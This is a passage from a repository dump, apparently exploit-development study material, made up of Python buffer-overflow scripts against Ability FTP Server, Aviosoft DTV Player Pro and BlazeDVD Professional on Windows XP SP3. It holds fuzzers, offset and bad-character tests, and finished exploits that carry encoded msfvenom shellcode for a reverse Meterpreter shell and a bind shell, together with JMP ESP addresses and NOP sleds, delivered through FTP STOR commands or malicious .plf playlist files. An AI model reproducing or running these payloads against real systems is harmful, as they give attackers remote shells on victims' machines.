"\xb9\xd5\xb7\xe2\x32\xa5\x56\x63\xa7\x7e\x58\x42\x76\xf4\x03" 12 | "\x44\x79\xd9\x3f\xcd\x61\x3e\x05\x87\x1a\xf4\xf1\x16\xca\xc4" 13 | "\xfa\xb5\x33\xe9\x08\xc7\x74\xce\xf2\xb2\x8c\x2c\x8e\xc4\x4b" 14 | "\x4e\x54\x40\x4f\xe8\x1f\xf2\xab\x08\xf3\x65\x38\x06\xb8\xe2" 15 | "\x66\x0b\x3f\x26\x1d\x37\xb4\xc9\xf1\xb1\x8e\xed\xd5\x9a\x55" 16 | "\x8f\x4c\x47\x3b\xb0\x8e\x28\xe4\x14\xc5\xc5\xf1\x24\x84\x81" 17 | "\x36\x05\x36\x52\x51\x1e\x45\x60\xfe\xb4\xc1\xc8\x77\x13\x16" 18 | "\x2e\xa2\xe3\x88\xd1\x4d\x14\x81\x15\x19\x44\xb9\xbc\x22\x0f" 19 | "\x39\x40\xf7\xba\x31\xe7\xa8\xd8\xbc\x57\x19\x5d\x6e\x30\x73" 20 | "\x52\x51\x20\x7c\xb8\xfa\xc9\x81\x43\x15\x56\x0f\xa5\x7f\x76" 21 | "\x59\x7d\x17\xb4\xbe\xb6\x80\xc7\x94\xee\x26\x8f\xfe\x29\x49" 22 | "\x10\xd5\x1d\xdd\x9b\x3a\x9a\xfc\x9b\x16\x8a\x69\x0b\xec\x5b" 23 | "\xd8\xad\xf1\x71\x8a\x4e\x63\x1e\x4a\x18\x98\x89\x1d\x4d\x6e" 24 | "\xc0\xcb\x63\xc9\x7a\xe9\x79\x8f\x45\xa9\xa5\x6c\x4b\x30\x2b" 25 | "\xc8\x6f\x22\xf5\xd1\x2b\x16\xa9\x87\xe5\xc0\x0f\x7e\x44\xba" 26 | "\xd9\x2d\x0e\x2a\x9f\x1d\x91\x2c\xa0\x4b\x67\xd0\x11\x22\x3e" 27 | "\xef\x9e\xa2\xb6\x88\xc2\x52\x38\x43\x47\x62\x73\xc9\xee\xeb" 28 | "\xda\x98\xb2\x71\xdd\x77\xf0\x8f\x5e\x7d\x89\x6b\x7e\xf4\x8c" 29 | "\x30\x38\xe5\xfc\x29\xad\x09\x52\x49\xe4") 30 | 31 | buffer = "A" *966 + "\x53\x93\x42\x7E" + '\x42'*16 + '\x90'*16 + shellcode + '\x42'*688 32 | 33 | print "\nSending evil buffer..." 34 | s.connect(('172.16.73.129',21)) 35 | data = s.recv(1023) 36 | s.send('USER ftp\r\n') 37 | data = s.recv(1024) 38 | s.send('PASS ftp\r\n') 39 | data = s.recv(1024) 40 | s.send('STOR ' + buffer + '\r\n') 41 | s.close() 42 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/5afs2.24.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | 6 | shellcode = ("\xda\xd9\xd9\x74\x24\xf4\xbb\x49\x4f\x85\xae\x5a\x31\xc9\xb1" 7 | "\x52\x31\x5a\x17\x83\xc2\x04\x03\x13\x5c\x67\x5b\x5f\x8a\xe5" 8 | "\xa4\x9f\x4b\x8a\x2d\x7a\x7a\x8a\x4a\x0f\x2d\x3a\x18\x5d\xc2" 9 | "\xb1\x4c\x75\x51\xb7\x58\x7a\xd2\x72\xbf\xb5\xe3\x2f\x83\xd4" 10 | "\x67\x32\xd0\x36\x59\xfd\x25\x37\x9e\xe0\xc4\x65\x77\x6e\x7a" 11 | "\x99\xfc\x3a\x47\x12\x4e\xaa\xcf\xc7\x07\xcd\xfe\x56\x13\x94" 12 | "\x20\x59\xf0\xac\x68\x41\x15\x88\x23\xfa\xed\x66\xb2\x2a\x3c" 13 | "\x86\x19\x13\xf0\x75\x63\x54\x37\x66\x16\xac\x4b\x1b\x21\x6b" 14 | "\x31\xc7\xa4\x6f\x91\x8c\x1f\x4b\x23\x40\xf9\x18\x2f\x2d\x8d" 15 | "\x46\x2c\xb0\x42\xfd\x48\x39\x65\xd1\xd8\x79\x42\xf5\x81\xda" 16 | "\xeb\xac\x6f\x8c\x14\xae\xcf\x71\xb1\xa5\xe2\x66\xc8\xe4\x6a" 17 | "\x4a\xe1\x16\x6b\xc4\x72\x65\x59\x4b\x29\xe1\xd1\x04\xf7\xf6" 18 | "\x16\x3f\x4f\x68\xe9\xc0\xb0\xa1\x2e\x94\xe0\xd9\x87\x95\x6a" 19 | "\x19\x27\x40\x3c\x49\x87\x3b\xfd\x39\x67\xec\x95\x53\x68\xd3" 20 | "\x86\x5c\xa2\x7c\x2c\xa7\x25\x2f\xa1\xee\x35\x47\xc0\xf0\x24" 21 | "\xc4\x4d\x16\x2c\xe4\x1b\x81\xd9\x9d\x01\x59\x7b\x61\x9c\x24" 22 | "\xbb\xe9\x13\xd9\x72\x1a\x59\xc9\xe3\xea\x14\xb3\xa2\xf5\x82" 23 | "\xdb\x29\x67\x49\x1b\x27\x94\xc6\x4c\x60\x6a\x1f\x18\x9c\xd5" 24 | "\x89\x3e\x5d\x83\xf2\xfa\xba\x70\xfc\x03\x4e\xcc\xda\x13\x96" 25 | "\xcd\x66\x47\x46\x98\x30\x31\x20\x72\xf3\xeb\xfa\x29\x5d\x7b" 26 | "\x7a\x02\x5e\xfd\x83\x4f\x28\xe1\x32\x26\x6d\x1e\xfa\xae\x79" 27 | "\x67\xe6\x4e\x85\xb2\xa2\x7f\xcc\x9e\x83\x17\x89\x4b\x96\x75" 28 | "\x2a\xa6\xd5\x83\xa9\x42\xa6\x77\xb1\x27\xa3\x3c\x75\xd4\xd9" 29 | "\x2d\x10\xda\x4e\x4d\x31") 30 | 31 | buffer = "A" *966 + "\x0a\xaf\xd8\x77" + "\x90"*50 + shellcode + "\x90"*600 32 | 33 | print "\nSending evil buffer..." 34 | s.connect(('172.16.73.129',21)) 35 | data = s.recv(1023) 36 | s.send('USER ftp\r\n') 37 | data = s.recv(1024) 38 | s.send('PASS ftp\r\n') 39 | data = s.recv(1024) 40 | s.send('STOR ' + buffer + '\r\n') 41 | s.close() 42 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/ability_ftp_server_eip1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ability FTP Server Exploit Find Offset 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | print banner 16 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 17 | #shellcode = ( 18 | 19 | offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 20 | 21 | #nowjump 22 | #bufferandshellcode 23 | sploit = offset 24 | 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | try: 27 | print "\nDestroy them with lazers..." 28 | s.connect(('172.16.73.129',21)) 29 | s.recv(1024) 30 | s.send('USER ftp\r\n') 31 | s.recv(1024) 32 | s.send('PASS ftp\r\n') 33 | s.recv(1024) 34 | s.send('STOR ' + sploit + '\r\n\n') 35 | s.recv(1024) 36 | s.send('QUIT\r\n') 37 | s.close 38 | print "\nFire in the hole! Go pick up the pieces!" 39 | except: 40 | print "ERROR! Shutting it dooooown.." 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/ability_ftp_server_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ability FTP Server Exploit - Offset & JMP ESP 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 15 | #shellcode = () 16 | 17 | #EIP = 69413269 -> offset at 247 18 | offset = 'A'*966 19 | 20 | #JMP ESP = !mona jmp -r esp -> 0x7e429353 or \x53\93\x42\x7e 21 | #nowjump = '\x53\x93\x42\x7e' 22 | nowjump = 'B'*4 23 | 24 | #bufferandshellcode 25 | sploit = offset + nowjump + 'C'*(1000) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | print "\nDestroy them with lazers..." 30 | s.connect(('172.16.73.129',21)) 31 | s.recv(1024) 32 | s.send('USER ftp\r\n') 33 | s.recv(1024) 34 | s.send('PASS ftp\r\n') 35 | s.recv(1024) 36 | s.send('STOR ' + sploit + '\r\n\n') 37 | s.recv(1024) 38 | s.send('QUIT\r\n') 39 | s.close 40 | print "\nFire in the hole! Go pick up the pieces!" 41 | except: 42 | print "ERROR! Shutting it dooooown.." 43 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/ability_ftp_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ability FTP Server Exploit Fuzzer 10 | 1. python ability_ftp_server_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | 18 | offset = "A" *5000 19 | #nowjump 20 | #bufferandshellcode 21 | sploit = offset 22 | 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',21)) 27 | s.recv(1024) 28 | s.send('USER ftp\r\n') 29 | s.recv(1024) 30 | s.send('PASS ftp\r\n') 31 | s.recv(1024) 32 | s.send('STOR ' + sploit + '\r\n\n') 33 | s.recv(1024) 34 | s.send('QUIT\r\n') 35 | s.close 36 | print "\nFire in the hole! Go pick up the pieces!" 37 | except: 38 | print "ERROR! Shutting it dooooown.." 39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/afs2.2.24.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import ftplib 4 | from ftplib import FTP 5 | import struct 6 | 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | buffer="A"*5000 10 | 11 | print "\nSending evil buffer..." 12 | s.connect(('172.16.73.129',21)) 13 | data = s.recv(1023) 14 | s.send('USER ftp\r\n') 15 | data = s.recv(1024) 16 | s.send('PASS ftp\r\n') 17 | data = s.recv(1024) 18 | s.send('STOR ' + buffer + '\r\n') 19 | s.close() 20 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ability_FTP_Server/afs2.34-1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | 5 | # Create an array of buffers, from 0 to 2000, with increments of 100. 6 | buffer=["A"] 7 | counter=20 8 | 9 | while len(buffer) <= 30: 10 | buffer.append("A"*counter) 11 | counter=counter+100 12 | 13 | #Define the FTP commands to be fuzzed 14 | commands=["LIST, CWD"] 15 | 16 | # Run the fuzzing loop 17 | for command in commands: 18 | for string in buffer: 19 | print "Fuzzing " + command + " with length:" +str(len(string)) 20 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | connect=s.connect(('172.16.73.129',21)) #IP Address of the victim 22 | s.recv(1024) 23 | s.send('USER anonymous\r\n') 24 | s.recv(1024) 25 | s.send('PASS anonymous\r\n') 26 | s.recv(1024) 27 | s.send(command + ' ' + string + '\r\n') 28 | s.recv(1024) 29 | s.send('QUIT\r\n') 30 | s.close() 31 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_badchars.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_badchars.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("avisoft_badchars.plf","wb") 4 | 5 | buffer = "http://" 6 | buffer += "A"*253 7 | buffer += "B"*4 8 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1b\x1c\x1d\x1e\x1f" 9 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 10 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 11 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 12 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 13 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 14 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 15 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 16 | 17 | file.write(buffer) 18 | 19 | file.close() 20 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("avisfot_crash.plf","wb") 4 | 5 | buffer = "http://" 6 | buffer += "A"*5000 7 | 8 | file.write(buffer) 9 | 10 | file.close() 11 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_eip_b_crash.plf: -------------------------------------------------------------------------------- 1 | http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_eip_b_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("avisoft_eip_b_crash.plf","wb") 4 | 5 | buffer = "http://" 6 | buffer += "A"*253 7 | buffer += "B"*4 8 | buffer += "C"*300 9 | 10 | file.write(buffer) 11 | 12 | file.close() 13 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_shellcode_1.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_shellcode_1.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/AviosoftDTVPlayerPro/avisoft_shellcode_1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("avisoft_shellcode_1.plf","wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c 6 | 7 | shellcode = ("\xbb\x12\xad\x81\x94\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" 8 | "\x53\x31\x58\x12\x03\x58\x12\x83\xd2\xa9\x63\x61\x2e\x59\xe1" 9 | "\x8a\xce\x9a\x86\x03\x2b\xab\x86\x70\x38\x9c\x36\xf2\x6c\x11" 10 | "\xbc\x56\x84\xa2\xb0\x7e\xab\x03\x7e\x59\x82\x94\xd3\x99\x85" 11 | "\x16\x2e\xce\x65\x26\xe1\x03\x64\x6f\x1c\xe9\x34\x38\x6a\x5c" 12 | "\xa8\x4d\x26\x5d\x43\x1d\xa6\xe5\xb0\xd6\xc9\xc4\x67\x6c\x90" 13 | "\xc6\x86\xa1\xa8\x4e\x90\xa6\x95\x19\x2b\x1c\x61\x98\xfd\x6c" 14 | "\x8a\x37\xc0\x40\x79\x49\x05\x66\x62\x3c\x7f\x94\x1f\x47\x44" 15 | "\xe6\xfb\xc2\x5e\x40\x8f\x75\xba\x70\x5c\xe3\x49\x7e\x29\x67" 16 | "\x15\x63\xac\xa4\x2e\x9f\x25\x4b\xe0\x29\x7d\x68\x24\x71\x25" 17 | "\x11\x7d\xdf\x88\x2e\x9d\x80\x75\x8b\xd6\x2d\x61\xa6\xb5\x39" 18 | "\x46\x8b\x45\xba\xc0\x9c\x36\x88\x4f\x37\xd0\xa0\x18\x91\x27" 19 | "\xc6\x32\x65\xb7\x39\xbd\x96\x9e\xfd\xe9\xc6\x88\xd4\x91\x8c" 20 | "\x48\xd8\x47\x38\x40\x7f\x38\x5f\xad\x3f\xe8\xdf\x1d\xa8\xe2" 21 | "\xef\x42\xc8\x0c\x3a\xeb\x61\xf1\xc5\x02\x2e\x7c\x23\x4e\xde" 22 | "\x28\xfb\xe6\x1c\x0f\x34\x91\x5f\x65\x6c\x35\x17\x6f\xab\x3a" 23 | "\xa8\xa5\x9b\xac\x23\xaa\x1f\xcd\x33\xe7\x37\x9a\xa4\x7d\xd6" 24 | "\xe9\x55\x81\xf3\x99\xf6\x10\x98\x59\x70\x09\x37\x0e\xd5\xff" 25 | "\x4e\xda\xcb\xa6\xf8\xf8\x11\x3e\xc2\xb8\xcd\x83\xcd\x41\x83" 26 | "\xb8\xe9\x51\x5d\x40\xb6\x05\x31\x17\x60\xf3\xf7\xc1\xc2\xad" 27 | "\xa1\xbe\x8c\x39\x37\x8d\x0e\x3f\x38\xd8\xf8\xdf\x89\xb5\xbc" 28 | "\xe0\x26\x52\x49\x99\x5a\xc2\xb6\x70\xdf\xf2\xfc\xd8\x76\x9b" 29 | "\x58\x89\xca\xc6\x5a\x64\x08\xff\xd8\x8c\xf1\x04\xc0\xe5\xf4" 30 | "\x41\x46\x16\x85\xda\x23\x18\x3a\xda\x61") 31 | 32 | buffer = "http://" 33 | buffer += "A"*253 34 | buffer += "\x53\x93\x42\x7e" 35 | buffer += "\x90"*100 36 | buffer += shellcode 37 | buffer += "C"*300 38 | 39 | file.write(buffer) 40 | 41 | file.close() 42 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/badchars.txt: -------------------------------------------------------------------------------- 1 | \x00 2 | \x0a 3 | \x1a 4 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/blazeexploit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/blazeexploit.zip -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_crash.plf: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_crash.plf", "wb") 4 | 5 | buffer = "A"*700 6 | 7 | file.write(buffer) 8 | 9 | file.close() -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_b_overwrite.plf: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_b_overwrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_eip_b_overwrite.plf", "wb") 4 | 5 | buffer = "A"*260 6 | buffer += "B"*4 7 | buffer += "C"*500 8 | 9 | file.write(buffer) 10 | 11 | file.close() 12 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_badchars.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_badchars.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_eip_badchars.plf", "wb") 4 | 5 | buffer = "A"*260 6 | buffer += "B"*4 7 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | 